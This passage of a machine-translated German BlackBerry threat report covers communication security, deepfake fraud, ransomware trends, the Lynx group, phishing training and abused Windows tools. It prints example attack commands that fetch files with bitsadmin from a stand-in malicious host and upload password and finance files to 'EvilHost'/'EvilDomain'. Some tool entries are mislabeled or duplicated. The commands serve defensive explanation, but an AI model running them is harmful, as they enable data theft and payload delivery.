Sicherheit von Links und Nachrichten: Social-Engineering-Angriffe nutzen das Vertrauen in bekannte Telefonnummern und Nachrichtenquellen aus, um bösartige Inhalte zu verbreiten.

  • Taktik: Erstellen Sie strenge Protokolle für die Handhabung von Links und implementieren Sie Systeme, die den Inhalt von Nachrichten vor der Zustellung scannen und verifizieren.
  • Beispiel: Ein Bankinstitut führt eine "No-Click"-Richtlinie für externe Links ein und verlangt, dass alle wichtigen Mitteilungen über die eigene sichere Plattform erfolgen.

Kontrolle der Infrastruktur: Unternehmen müssen ihre Kommunikationskanäle vollständig überwachen, um unbefugten Zugriff zu verhindern und Sicherheitsstandards einzuhalten.

  • Taktik: Einsatz von Kommunikationssystemen, bei denen das Unternehmen die volle Kontrolle über Infrastruktur, Benutzerautorisierung und Sicherheitsprotokolle behält.
  • Beispiel: Ein Rüstungsunternehmen führt ein geschlossenes Kommunikationssystem ein, bei dem alle Benutzer vorab autorisiert sein müssen und die gesamte Kommunikation über überwachte, sichere Kanäle läuft.

Schutz von Metadaten: Kommunikationsmuster und Metadaten können sensible Informationen preisgeben, selbst wenn der Inhalt der Nachricht sicher ist.

  • Taktik: Verschlüsselung und Tunnelung aller Metadaten, einschließlich Anruferinformationen, Kommunikationsdauer und Beziehungsmuster zwischen Benutzern.
  • Beispiel: Ein Finanzinstitut verhindert, dass Konkurrenten ihre Fusionsgespräche nachvollziehen können, indem es nicht nur die Kommunikation verschlüsselt, sondern auch die Muster, nach denen die Führungskräfte miteinander kommunizieren.

Verbesserung der mobilen Sicherheit: Die mobile Kommunikation stellt besondere Sicherheitsanforderungen, die spezielle kryptografische Lösungen erfordern.

  • Taktik: Implementierung zertifizierter kryptografischer Authentifizierungen für die gesamte mobile Kommunikation, um Anrufspoofing, Betrug und unbefugten Zugriff zu verhindern.
  • Beispiel: Eine Regierungsbehörde setzt mobile Geräte mit integrierter kryptografischer Authentifizierung ein, um sicherzustellen, dass die gesamte Kommunikation unabhängig vom Standort verifiziert und sicher ist.

Kontrolle über den Lebenszyklus von Daten: Herkömmliche Kommunikationssysteme geben die Kontrolle über die einmal freigegebenen Daten ab, was zu dauerhaften Sicherheitslücken führt.

  • Taktik: Behalten Sie das organisatorische Eigentum an allen gemeinsam genutzten Daten bei und haben Sie jederzeit die Möglichkeit, den Zugriff zu widerrufen oder Inhalte zu löschen.
  • Beispiel: Wenn eine Führungskraft ein Fortune-100-Unternehmen verlässt, wird der Zugriff auf alle zuvor gemeinsam genutzten Dokumente und Mitteilungen sofort gesperrt.

Social Engineering Defense: Grundlegendes menschliches Verhalten stellt oft die größte Sicherheitslücke in Kommunikationssystemen dar.

  • Taktik: Implementieren Sie umfassende Schulungsprogramme, die von automatischen Systemen unterstützt werden, um Social-Engineering-Versuche zu erkennen und zu verhindern.
  • Beispiel: Die sichere Kommunikationsplattform eines Unternehmens kennzeichnet automatisch alle ungewöhnlichen Kommunikationsmuster oder -anfragen und verlangt eine zusätzliche Überprüfung.

Integration der Risikobewertung: Die Sicherheitsmaßnahmen müssen auf die spezifischen Unternehmensrisiken und gesetzlichen Anforderungen zugeschnitten sein.

  • Taktik: Bewerten Sie regelmäßig die Sicherheitsrisiken in der Kommunikation und passen Sie die Protokolle an neu auftretende Bedrohungen und Compliance-Anforderungen an.
  • Beispiel: Ein Gesundheitsdienstleister führt vierteljährliche Bewertungen seiner Kommunikationssicherheitsmaßnahmen durch und aktualisiert die Protokolle auf der Grundlage neuer Bedrohungsdaten und gesetzlicher Änderungen.

Ganzheitliche Sicherheitsintegration: Die Kommunikationssicherheit muss in eine umfassendere Cybersicherheitsstrategie integriert werden.

  • Taktik: Sicherstellen, dass sichere Kommunikation mit anderen Sicherheitsmaßnahmen und -protokollen zusammenarbeitet.
  • Beispiel: Ein Fertigungsunternehmen integriert seine sichere Kommunikationsplattform mit seinen Zugangskontroll- und Data Loss Prevention-Systemen und schafft so eine einheitliche Sicherheit Ökosystem.

Temporäre Datenarchitektur: Eine dauerhafte Datenspeicherung erhöht die Anfälligkeit für Verstöße und unbefugten Zugriff.

  • Taktik: Implementieren Sie Systeme, die die Datenpersistenz durch temporäre Speicherung und automatische Löschprotokolle minimieren.
  • Beispiel: Die Kommunikationsplattform einer Anwaltskanzlei löscht automatisch Nachrichten von den Servern, unmittelbar nachdem sie allen berechtigten Empfängern zugestellt wurden.

In unserem Blog erfahren Sie mehr darüber, wie Bedrohungsakteure gestohlene Metadaten aus der mobilen Kommunikation nutzen und missbrauchen.

Die Gefahren von Deepfakes

Das FBI hat vor kurzem eine Warnung über Cyberkriminelle veröffentlicht, die generative KI nutzen, um groß angelegte Betrügereien zu begehen, die sich mit ausgeklügelten Betrügereien gegen Unternehmen und Finanzorganisationen richten. Das Gutachten warnt vor den Folgen von Deepfake-Videos und -Stimmenanrufen sowie KI-generierten Profilbildern, um sich als Personen auszugeben, die für Einstellungsbetrügereien verwendet werden können, wie z. B. die nordkoreanische Kampagne zur Infiltrierung westlicher IT-Unternehmen mit Spionen, die sich als Fernarbeiter ausgeben.

Diese neue, erweiterte Angriffsfläche für Cyberangriffe ist eine sehr reale Bedrohung für Unternehmen aller Größenordnungen, wobei die Verluste bis 2027 voraussichtlich 40 Milliarden US-Dollar erreichen werden. Shiladitya Sircar, Senior VP of Product Engineering and Data Science bei BlackBerry, erklärte kürzlich in einer Folge des PodcastsUnsupervised Learning von Daniel Miessler: "Diese Art von generativen KI Angreifern schafft mit all diesen multimodalen Informationen neue Angriffsvektoren, die niemand kommen sieht. Es entsteht eine komplexere, nuanciertere Bedrohungslandschaft, die identitätsgesteuerte Angriffe priorisiert, und es wird nur noch besser werden."

Die Auswirkungen auf die Unternehmen sind tiefgreifend. Wenn sich die Beteiligten nicht mehr auf die Authentizität der Kommunikation von Führungskräften verlassen können, ist jeder Aspekt der Geschäftstätigkeit betroffen - von marktbewegenden Ankündigungen bis hin zu internen strategischen Richtlinien. Der Banken- und Finanzdienstleistungssektor hat sich als Hauptangriffsziel herauskristallisiert und steht vor beispiellosen Herausforderungen bei der Aufrechterhaltung sicherer Kommunikations- und Transaktionsprüfungsprozesse. Sircar stellt fest: "Der besorgniserregendste Aspekt dieser Deepfakes ist das Potenzial, das Vertrauen zu untergraben - das Vertrauen in Systeme, die legitim sind, die wahr sind.

Vorausschauende Unternehmen positionieren sich bereits im Vorfeld neuer gesetzlicher Anforderungen, darunter der U.S. No KI Fraud Act und die kanadische Gesetzgebung zu nicht-konsensuellen Medien. Diese regulatorischen Entwicklungen signalisieren einen entscheidenden Wandel in der Art und Weise, wie Unternehmen Kommunikationssicherheit und Identitätsüberprüfung angehen müssen.

Mit der Verbesserung von Deep-Voice- und generativer KI Stimmveränderungssoftware ist es wahrscheinlich, dass diese Tools bei einer wachsenden Zahl gezielter Angriffe häufiger zum Einsatz kommen werden. Wenn Sie mehr über Deepfakes erfahren möchten, einschließlich Abhilfemaßnahmen, die Sie zum Schutz Ihres Unternehmens einsetzen können, können Sie unsere Whitepaper über Deepfakes hier herunterladen oder unsere vollständige Diskussion mit Shiladitya Sircar im Podcast über unüberwachtes Lernen anhören.

Wenn Sie glauben, dass Sie Opfer einer Deepfake-Betrugsmasche geworden sind, können Sie beim Internet Crime Complaint Center des FBI unter www.ic3.gov einen Bericht einreichen .

Rampenlicht für die Strafverfolgung

BlackBerry arbeitet mit Strafverfolgungsbehörden auf der ganzen Welt zusammen, um die Zusammenarbeit zwischen öffentlichem und privatem Sektor im Bereich der Cybersicherheit zu verbessern. Seit dem Global Threat Intelligence Report vom September 2024 arbeitet BlackBerry mit dem National Cybercrime Coordination Centre (NC3) der Royal Canadian Mounted Police zusammen, um Informationen auszutauschen. Die folgenden Informationen wurden vom NC3 zur Verfügung gestellt, um Trends in der Cyberkriminalität aus Sicht der Strafverfolgungsbehörden aufzuzeigen.
Rampenlicht für die Strafverfolgung

Historischer Hintergrund: Das Aufkommen von Ransomware-Gruppen

Die Ransomware Ökosystem hat sich seit dem ersten aufgezeichneten Angriff im Jahr 1989, als der AIDS-Trojaner veröffentlicht wurde, erheblich weiterentwickelt. Vor dem Aufkommen von Kryptowährungen im Jahr 2010 entwickelte sich Ransomware schrittweise. Die Bitcoin-Ära hat jedoch zu einem raschen Anstieg der Cyberbedrohungen geführt, insbesondere in den letzten sechs Monaten.

Im Jahr 2019 richteten Gruppen wie MAZE, Ryuk und Sodinokibi/REvil großen Schaden an, indem sie Computersysteme und Netzwerke verschlüsselten und Zahlungen für Entschlüsselungsschlüssel forderten. Dies war zu dieser Zeit eine effektive Angriffsstrategie, da nur wenige Unternehmen Systemsicherungen aufrechterhielten und noch weniger über Reaktionspläne für Cybervorfälle verfügten.

 

Die sich ständig weiterentwickelnde Ransomware-Bedrohung

In dieser Zeit wurden Ransomware-Operationen ähnlich wie traditionelle Gruppen des organisierten Verbrechens betrachtet: erfahrene Cyberkriminelle, die sich für eine gemeinsame Sache oder einen gemeinsamen Zweck zusammenschließen. Seitdem haben sich Ransomware-Gruppen zu sehr anpassungsfähigen Gegnern entwickelt, und mit der Verbesserung der Cybersicherheitspraktiken haben sich auch die Taktiken, Techniken und Verfahren (TTPs) der Ransomware-Betreiber verbessert.

Um den finanziellen Gewinn zu sichern, sind Ransomware-Gruppen von der einfachen Erpressung (nur Datenverschlüsselung) zur doppelten Erpressungstaktik übergegangen und verlangen Lösegeldzahlungen für den Entschlüsselungsschlüssel und zusätzlich, um zu verhindern, dass gestohlene Daten im Dark Web verkauft werden.

Auch die Zahl der Ransomware-Aktivitäten hat stetig zugenommen, wobei sich alte Gruppen umbenannt haben, neue Gruppen die Website Ökosystem betreten und neue Geschäftsmodelle entstehen. Ransomware-as-a-Service (RaaS) sowie schnellere Verschlüsselungsmethoden, bessere Verschleierungstechniken und die Möglichkeit, mehrere Betriebssysteme anzugreifen, sind einige der bemerkenswerten Fortschritte der letzten Jahre.

Während einige Ransomware-Operationen weiterhin Dateien und Systeme verschlüsseln, haben sich andere dafür entschieden, auf diesen Schritt zu verzichten und zu einem reinen Exfiltrationsmodell überzugehen. Diese Änderung des Ansatzes ist wahrscheinlich eine Reaktion auf die Einführung besserer Cybersicherheitspraktiken und die verstärkte Nutzung von Systemsicherungen und Notfallwiederherstellungsdiensten.

Ein drittes Element der Erpressung

In jüngster Zeit haben Ransomware-Operationen ein drittes Element der Erpressung hinzugefügt. Statt nur Daten zu exfiltrieren und damit zu drohen, sie online zu stellen, nehmen sich einige Ransomware-Betreiber die Zeit, die gestohlenen Daten zu analysieren und sie als Waffe einzusetzen, um den Druck auf Opfer zu erhöhen, die sich weigern zu zahlen. Diese Strategie kann die Weitergabe von Kontaktinformationen oder die Verbreitung von Drohungen an die Familienmitglieder von CEOs und Geschäftsinhabern beinhalten, sowie die Drohung, alle Informationen über illegale Geschäftsaktivitäten, die in den gestohlenen Daten aufgedeckt wurden, an die Behörden zu melden. Die Ransomware-Betreiber können damit drohen, Kunden oder Klienten zu kontaktieren oder, schlimmer noch, weitere Angriffe zu starten, wenn die Lösegeldforderungen nicht erfüllt werden.

Darüber hinaus hat das NC3 eine beträchtliche Anzahl neuer Ransomware-Varianten auftauchen sehen. Die Ransomware Ökosystem scheint aus heterogenen Gruppen von Personen zu bestehen, deren Fähigkeiten vom Social Engineering über die Vermittlung des Erstzugangs, fortgeschrittene Verschlüsselung, Malware-Entwicklung und Verhandlungen bis hin zur Öffentlichkeitsarbeit reichen. Die Ransomware Ökosystem ist ein kompliziertes, zusammenhängendes Netzwerk. Die Bekämpfung von Ransomware-Operationen erfordert einen ebenso komplexen, multidisziplinären Ansatz.

Herausforderungen bei der Strafverfolgung

Für die Strafverfolgungsbehörden stellt die kontinuierliche Entwicklung im Bereich Ransomware eine große Herausforderung dar, die innovative Lösungen erfordert. Ransomware ist eine der größten globalen Bedrohungen, und sie wird wahrscheinlich so lange bestehen bleiben, wie die Opfer zahlen.

Aus früheren Einsätzen der Strafverfolgungsbehörden gegen bekannte Ransomware-Gruppen wie Hive, BlackCat und LockBit wissen wir, dass Ransomware-Akteure ihre Taktiken schnell anpassen können, um die Bemühungen der Strafverfolgungsbehörden zu vereiteln. Diese Anpassungsbemühungen haben die Ransomware Ökosystem aufgesplittert und zwingen die Strafverfolgungsbehörden dazu, vielschichtige Strategien anzuwenden, die kreative Methoden zur Unterbrechung von Operationen beinhalten (z. B. Angriff auf Infrastruktur, Ruf und Vertrauen).

Die 10 größten kanadischen Ransomware-Bedrohungen

Das NC3 arbeitet eng mit nationalen und internationalen Strafverfolgungsbehörden, Regierungspartnern, der Privatwirtschaft und der Wissenschaft zusammen, um die Reaktion der kanadischen Strafverfolgungsbehörden auf Cyberkriminalität kontinuierlich zu verbessern. Das National Cybercrime Coordination Centre leistet nicht nur einen Beitrag zu spezifischen Strafverfolgungsmaßnahmen im Bereich der Cyberkriminalität und unterstützt diese, sondern beobachtet auch routinemäßig die Entwicklung der Cyberbedrohungslandschaft und führt alle drei Jahre eine Bewertung der Ransomware-Betreiber durch, die auf Kanada abzielen. Diese systematische Bewertung informiert die Cybersicherheitsbranche über Veränderungen in der Cyberkriminalität Ökosystem und hilft bei der Ausrichtung von Ermittlungsressourcen.

Die nachstehende Tabelle zeigt die häufigsten Ransomware-Bedrohungen in Kanada für den Berichtszeitraum von Mai bis August 2024, der sich mit dem Zeitraum dieses Berichts überschneidet.

Abbildung 8: Kanadische Ransomware-Bedrohungen, Mai - August 2024.
Abbildung 8: Kanadische Ransomware-Bedrohungen, Mai - August 2024.

Aufstrebende Gruppen im Blickpunkt - Lynx Ransomware

Die Lynx-Ransomware-Gruppe tauchte erstmals im Juli 2024 in der Bedrohungslandschaft auf und zählte in den folgenden Monaten schnell mehr als 25 Opfer. Die angegriffenen Unternehmen waren über eine Vielzahl von Branchen verteilt und befanden sich hauptsächlich in Nordamerika und Europa.

Was ist die Lynx-Gruppe?

Wie viele andere Ransomware-Betreiber verwendet auch die Lynx-Gruppe eine doppelte Erpressungsstrategie. Nachdem sie sich unrechtmäßig Zugang zu einem System oder Netzwerk verschafft haben, exfiltrieren sie zunächst sensible Daten, bevor sie diese verschlüsseln und für den Besitzer unzugänglich machen. Anschließend drohen sie damit, die Daten öffentlich zu veröffentlichen, wenn das Lösegeld nicht gezahlt wird. Wenn ein Unternehmen von Lynx infiltriert wurde, veröffentlicht die Gruppe eine Blog auf einer Leak-Site - die über das öffentliche Internet oder das Dark Web oder manchmal auch über beide zugänglich ist -, um das Opfer zu "beschämen".

Abbildung 9: Screenshot der Lynx Dark Web Leak Site.
Abbildung 9: Screenshot der Lynx Dark Web Leak Site.
Die gestohlenen Daten können von der Gruppe in Lösegeldverhandlungen weiter genutzt werden, wobei die Veröffentlichung weiterer Informationen angedroht wird, wenn das Opfer nicht auf weitere Lösegeldforderungen eingeht.

Von Lynx anvisierte Branchen und Regionen

In den nachstehenden Abbildungen sehen Sie die Gebiete und Branchen, in denen Lynx häufiger anzutreffen ist. Lynx richtet sich vor allem an nordamerikanische und australische Unternehmen, aber auch an das Vereinigte Königreich und Teile von Europa
Von Lynx anvisierte Branchen und Regionen
Abbildung 10: Die geografische Verteilung der Opfer von Lynx.
Abbildung 11: Von Lynx anvisierte Schlüsselindustrien.

Wie Lynx arbeitet

Lynx unterhält sowohl eine Surface-Website als auch eine Deep-Web-Leak-Website sowie eine Reihe gespiegelter Websites, die sich unter ".onion"-Adressen befinden - vermutlich, um die Betriebszeit sicherzustellen, falls eine ihrer Websites von den Strafverfolgungsbehörden offline genommen wird. Lynx verwendet auch einen eigenen Verschlüsselungscode, der bei näherer Betrachtung durch BlackBerry-Forscher aus der gleichen Codebasis entwickelt zu sein scheint wie der der berüchtigten INC Ransom-Gruppe.

Bisher wurden eine Handvoll Samples, die mit dem von der Lynx-Gruppe verwendeten Verschlüsselungsprogramm zusammenhängen, in freier Wildbahn identifiziert. Alle Beispiele scheinen in C++ geschrieben zu sein und weisen keinerlei Verpackung oder Verschleierung auf, um eine Analyse zu erschweren.

Sobald die Ziele vor der Verschlüsselung, wie z. B. die Erlangung des Erstzugriffs und die Datenexfiltration, erreicht sind, wird die Ransomware in der Umgebung des Opfers installiert. Die Ransomware selbst ist so konzipiert, dass sie über die Befehlszeilenkonsole ausgeführt wird und mehrere optionale Argumente unterstützt. So kann der Angreifer seine Vorgehensweise bei der Dateiverschlüsselung an seine Ziele anpassen.

Bei der Ausführung unterstützt die Malware außerdem einen "--verbose"-Modus, der eine Liste der Operationen ausgibt, die die Ransomware während ihrer dynamischen Ausführung durchführt.

Wie Lynx arbeitet
Abbildung 12: Lynx-Verschlüsselungsprogramm im ausführlichen Modus.

Um zu verhindern, dass das Gerät eines Opfers funktionsunfähig wird, lässt die Malware bestimmte Dateitypen und Windows-Ordner von der Verschlüsselung aus. Dies dient einem doppelten Zweck, indem es die Verschlüsselung beschleunigt und verhindert, dass wichtige Windows-Programme unzugänglich werden, was das Gerät "blockieren" und die Chance der Gruppe, Lösegeld zu erpressen, zunichte machen würde.

Eine ausführlichere Analyse dieser neuen Bedrohung finden Sie in unserem vollständigen Bericht über Lynx.

Operative Sicherheitsmaßnahmen

Regelmäßige Schulungen zum Sicherheitsbewusstsein sind für eine wachsame Unternehmenskultur unerlässlich. Themen wie Phishing-Prävention, Sicherheit von Anmeldedaten und Fernzugriffssicherheit sollten dabei im Vordergrund stehen.

  • Taktik: Implementieren Sie ein "Spot the Red Flag"-Schulungsprogramm, bei dem die Mitarbeiter simulierte Phishing-E-Mails erhalten, die gängige Täuschungselemente enthalten, gefolgt von einem sofortigen pädagogischen Feedback, das jeden verdächtigen Indikator erklärt. Verfolgen Sie die Reaktionsraten der Mitarbeiter und bieten Sie gezielte Nachschulungen auf der Grundlage individueller Leistungskennzahlen an.
  • Beispiel: Ein internationaler Einzelhändler reduziert seine Phishing-Vorfälle erheblich, indem er ein umfassendes Schulungsprogramm in Verbindung mit einem robusten Patch-Management-System einführt, um Schwachstellen umgehend zu beheben.
  • Es genügt ein einziger Mitarbeiter, der auf einen bösartigen Link klickt, um die Systeme und die Infrastruktur eines Unternehmens zu gefährden. Hier finden Sie ein Beispiel für eine Phishing-Nachricht, die Sie in Ihr Training einbauen können.
Abbildung 13a: Typische Verbindungsanfrage, die ein Mitarbeiter erhalten könnte.
Abbildung 13a: Typische Verbindungsanfrage, die ein Mitarbeiter erhalten könnte.
Bei genauerem Hinsehen erkennt man jedoch die typischen Merkmale einer Phishing-E-Mail (Abbildung 13b):
Abbildung 13b: Rote Fahnen, auf die man in einer Phishing-E-Mail achten sollte.
Abbildung 13b: Rote Fahnen, auf die man in einer Phishing-E-Mail achten sollte.
  1. Die E-Mail-Adresse des Absenders behauptet, sie stamme von "linkedincdn.com" und nicht von der offiziellen LinkedIn.com-Domain - eine klassische Domain-Spoofing-Technik.
  2. Ein Warnbanner weist darauf hin, dass dies von einer externen Quelle stammt. Dies ist ein nützliches Sicherheitsmerkmal, das viele Unternehmen implementieren möchten.
  3. Die Nachricht verwendet zwei klassische Social-Engineering-Taktiken. Sie gibt vor, von einer hochrangigen Führungskraft (CISO) im Unternehmen der Zielperson zu stammen, und nutzt Schmeicheleien ("Ich habe viel Gutes über Sie gehört"), um zum Engagement zu bewegen.
  4. Das Exemplar ist uneinheitlich formatiert: Rechtschreib- und Grammatikfehler sind überall zu finden.
  5. Obwohl das Profilfoto den Anschein der Echtheit erweckt, können diese Fotos von jedem, der weiß, wie man mit der rechten Maustaste klickt und "Bild speichern unter" wählt, leicht von einem legitimen Profil kopiert werden.
  6. Das Erscheinungsbild der E-Mail ahmt die üblichen automatisierten Nachrichten nach, die von Social-Media-Websites an Nutzer verschickt werden.
    • Bei den Schaltflächen "Akzeptieren" und "Profil anzeigen" handelt es sich wahrscheinlich um bösartige Links, die zu Seiten zum Sammeln von Anmeldeinformationen oder zum Herunterladen von Malware führen können.
    • Der Link "Abmelden" am Ende der Nachricht kann ebenfalls bösartig sein. Phisher fügen diese oft ein, um legitim zu erscheinen, während sie die Nutzer in Wirklichkeit zu schädlicheren Inhalten führen.

Helfen Sie Ihren Mitarbeitern, das zu lernen:

  • Überprüfen Sie die E-Mail-Domänen der Absender sorgfältig.
  • Seien Sie misstrauisch gegenüber unaufgeforderten Verbindungsanfragen, insbesondere von hochrangigen Führungskräften.
  • Klicken Sie niemals auf Schaltflächen oder Links in verdächtigen E-Mails - stattdessen sollten Sie die betreffende Website besuchen, indem Sie die URL direkt in Ihren Browser eingeben.
  • Achten Sie auf die Sicherheitswarnungen in ihrem E-Mail-System.
  • Seien Sie vorsichtig mit Schmeicheleien oder Dringlichkeit bei unerwarteten Anfragen für berufliche Kontakte.

Cyberkriminelle verfeinern ihre Cyberangriffe ständig, um ihre Wirkung zu verstärken. Um sich gegen diese sich ständig weiterentwickelnden Bedrohungen zu schützen, müssen Unternehmen einen vorausschauenden Ansatz für ihre Cyber-Sicherheitsstrategien wählen. Dazu gehören strategische Investitionen in Technologien - wie Sicherheitsüberwachung, Mitarbeiterschulung und Reaktion auf Vorfälle - um sicherzustellen, dass sie auf ausgeklügelte Cyberbedrohungen vorbereitet sind.

Cyber Story Highlight: Coyote-Bankentrojaner zielt auf Lateinamerika und konzentriert sich auf brasilianische Finanzinstitute

Im Juli 2024 deckten BlackBerry-Forscher eine Kampagne auf, bei der Coyote für brasilianische Banken und Kryptowährungsbörsen eingesetzt wurde. Der steigende Trend zu geografisch ausgerichteten Banking-Trojanern unterstreicht die Notwendigkeit einer robusten Cybersicherheit und der Aufklärung der Benutzer, um Phishing- und Social-Engineering-Bedrohungen wie Coyote zu bekämpfen. Im Abschnitt "Abhilfemaßnahmen" dieses Berichts finden Sie weitere Sicherheitsideen, die Sie in Ihrem Unternehmen umsetzen können.

CylanceMDR: Bedrohungen und Abhilfemaßnahmen

Unternehmen sind nicht nur durch die Malware von Bedrohungsakteuren, sondern auch durch den Missbrauch legitimer Tools gefährdet. In diesem Abschnitt werden die häufigsten Bedrohungen vorgestellt, auf die das CylanceMDR™-Team in diesem Quartal in den Netzwerkumgebungen von Kunden gestoßen ist, sowie Abhilfemaßnahmen, die Unternehmen zur Stärkung ihrer Cyberabwehr einsetzen können.

CylanceMDR ist unser abonnementbasierter MDR-Service, der eine 24x7-Überwachung bietet und Unternehmen dabei hilft, ausgeklügelte Cyber-Bedrohungen abzuwehren, indem er Lücken in Sicherheitsumgebungen schließt.

LOLBAS Aktivität

LOLBAS Aktivität

LOLBAS bezieht sich auf integrierte Windows-Systemtools und legitime ausführbare Dateien, die Angreifer für bösartige Zwecke missbrauchen können. Der Begriff "vom Land leben" bedeutet, dass Tools verwendet werden, die bereits in der Zielumgebung ("das Land") vorhanden sind, anstatt zu riskieren, neue Malware einzuführen, die Sicherheitssysteme auslösen und das Ziel darauf aufmerksam machen könnte, dass es kompromittiert wurde. Die Gefahr von LOLBAS-basierten Angriffen liegt in ihrer Fähigkeit, Sicherheitskontrollen zu umgehen, da sie legitime Systemtools verwenden. Dies macht die Entdeckung schwierig, da die Systemaktivitäten auf den ersten Blick normal erscheinen.

Während des Berichtszeitraums wurden die folgenden LOLBAS-Aktivitäten beobachtet:

  • Bitsadmin ist nach wie vor das meistbeachtete LOLBAS.
  • Certutil ist das am zweithäufigsten beobachtete Mittel, obwohl seine Verwendung seit dem letzten Berichtszeitraum zurückgegangen ist.
  • Regsvr32, MSHTA und PsExec wurden ebenfalls beobachtet, machen aber nur einen geringen Prozentsatz der Gesamtaktivität aus.

Im Folgenden wird ein Beispiel für die böswillige Verwendung von LOLBAS gezeigt.

Abbildung 14: LOLBAS-Aktivität, Juli - September 2024.

Datei: Bitsadmin.exe

MITRE ATT&CK ID: T1197 | T1105
How It Can Be Abused: Download/upload from or to malicious host (Ingress tool transfer). Can be used to execute malicious process.
Example Command-Line:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest

Datei: mofcomp.exe

MITRE ATT&CK ID: T1218
How It Can Be Abused: Can be used to install malicious managed object format (MOF) scripts.
MOF statements are parsed by the mofcomp.exe utility and will add the classes and class instances defined in the file to the WMI repository.
Example Command-Line:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof

Exfiltrations-Tools

Exfiltrations-Tools

Bei Exfiltrationstools handelt es sich um Software, die zur Übertragung von Daten aus einer Zielumgebung heraus verwendet wird, häufig zu bösartigen Zwecken. In diesem Quartal untersuchte das Team von CylanceMDR die gängigsten Tools, die in unseren Kundenumgebungen zur Exfiltration verwendet werden könnten (ohne RMM-Tools).

Abbildung 15: Prozentsatz der missbrauchten Exfiltrationstools, Juli - September 2024.

WinSCP

Beschreibung: WinSCP ist ein Dateiübertragungsclient; PuTTY ist ein sicherer Shell-Client (SSH).

Beispiel Befehlszeile: winscp.exe scp://test: P@ss123[at]EvilHost[.]com:2222/ /upload passwords.txt /defaults=auto

Hinweis: Wird häufig in Verbindung mit einer grafischen Benutzeroberfläche (GUI) verwendet.

GEHRUNG ATT&CK ID: T1048

PSCP

Beschreibung: PuTTY Secure Copy Protocol (PSCP) ist ein Befehlszeilendienstprogramm für die Übertragung von Dateien und Ordnern.

Beispiel Befehlszeile: pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp

GEHRUNG ATT&CK ID: T1021.004

FileZilla

Beschreibung: FileZilla ist ein bekanntes FTP-Tool (File Transfer Protocol), das auf verschiedenen Betriebssystemen verwendet werden kann.

Beispiel Befehlszeile: filezilla.exe -u "ftp://test:p@ss1234[at]ftp.test[.]com" -e "put passwords.txt /remote_directory/pass.txt"

GEHRUNG ATT&CK ID: T1071.002

FreeFileSync

Beschreibung: PuTTY Secure Copy Protocol (PSCP) ist ein Befehlszeilendienstprogramm für die Übertragung von Dateien und Ordnern.

Beispiel Befehlszeile: pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp

GEHRUNG ATT&CK ID: T1021.004

Rclone

Beschreibung: FreeFileSync ist ein Synchronisationstool, das zur Verwaltung von Backups verwendet werden kann.

Beispiel Befehlszeile: FreeFileSync.exe google_drive_sync.ffs_batch

Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder e.g., <Left Path=“C:\sensitiveFiles” /> <Right Path=“D:\GoogleDriveFolder” />

GEHRUNG ATT&CK ID: T1567.002

Tools zur Fernüberwachung und -verwaltung

Tools zur Fernüberwachung und -verwaltung

Bedrohungsakteure missbrauchen RMM-Tools. Diese Tools bieten Angreifern eine einfache Möglichkeit, dauerhaften und einfachen Zugriff auf Systeme zu erhalten und Daten effizient zu exfiltrieren. Wie in unserem letzten Global Threat Intelligence Report festgestellt, ist dies die am schnellsten wachsende Kategorie für Ransomware-Gruppen, die diese Tools nutzen, um Daten aus Opferumgebungen zu exfiltrieren. In diesem Berichtszeitraum hat das Team von CylanceMDR die am häufigsten genutzten RMM-Tools in den Umgebungen unserer Kunden untersucht.

Bei unserer Analyse haben wir festgestellt, dass viele Kunden mehrere RMM-Tools in ihren Umgebungen einsetzen und damit die Angriffsfläche und das Risiko für ihr Unternehmen erhöhen.

Abbildung 16: Dieses Diagramm veranschaulicht den Prozentsatz der Angriffe, die durch den Missbrauch führender RMM-Tools ausgeführt werden.

 

Zu den vorgeschlagenen Abhilfemaßnahmen gehören:

1. Audit von Fernzugriffswerkzeugen

  • Ermittlung der derzeit in der Organisation verwendeten RMM-Tools.
  • Bestätigen Sie, dass sie in der Umgebung zugelassen sind.
  • Wenn Sie mehrere RMM-Tools verwenden, prüfen Sie, ob diese konsolidiert werden können. Durch die Reduzierung der Anzahl der verschiedenen Tools wird das Risiko verringert.

2. Deaktivieren von Ports und Protokollen

  • Blockieren Sie die ein- und ausgehende Netzwerkkommunikation zu häufig verwendeten Ports, die mit nicht zugelassenen Fernzugriffstools verbunden sind.
  • Verwenden Sie bei den Firewall-Regeln und der Anwendungskontrolle eher Standardverweigerungsregeln und Erlaubnislisten als eine Blockliste.

3. Überwachung von Endpunktaktivitäten und Netzwerkverkehr

  • Erkennung der anormalen Verwendung von Fernzugriffstools.

4. Flicken

  • Gewährleistung einer regelmäßigen Überprüfung der Schwachstellen im Zusammenhang mit den zulässigen RMM-Tools und gegebenenfalls Aktualisierung.
  • Bevorzugen Sie bei der Durchführung regelmäßiger Patch-Zyklen Systeme, die über das Internet zugänglich sind.

5. Netzsegmentierung

  • Minimieren Sie böswillige Seitwärtsbewegungen, indem Sie das Netzwerk segmentieren und den Zugriff auf Geräte und Daten beschränken.

6. Gerätekennzeichnung

  • Finden Sie heraus, ob Ihr Sicherheitsanbieter Optionen zur Kennzeichnung von Geräten anbietet, die RMM-Tools verwenden. Wenn ja, aktivieren Sie dies, um sicherzustellen, dass Ihr SOC Einblick hat. Einige Anbieter bieten die Möglichkeit, eine Notiz/Markierung zu hinterlassen, die genehmigte Tools/Aktivitäten identifiziert, was Analysten bei Untersuchungen sehr hilft.

7. Speicherladende RMM

  • Verwenden Sie Sicherheitssoftware, die Fernzugriffe erkennen kann, die nur im Speicher geladen werden.

CylanceMDR Die wichtigsten vierteljährlichen Bedrohungen

Im Folgenden sind die häufigsten Bedrohungen aufgeführt, die das Analystenteam von CylanceMDR in diesem Berichtszeitraum aufgedeckt hat und auf die es reagiert hat.
Abbildung 17: Die häufigsten Bedrohungen, die das Analystenteam von CylanceMDR in diesem Quartal entdeckt hat und auf die es reagiert hat.
Abbildung 17: Die häufigsten Bedrohungen, die das Analystenteam von CylanceMDR in diesem Quartal entdeckt hat und auf die es reagiert hat.

Highlight: Warnungen vom BlackBerry Incident Response Team

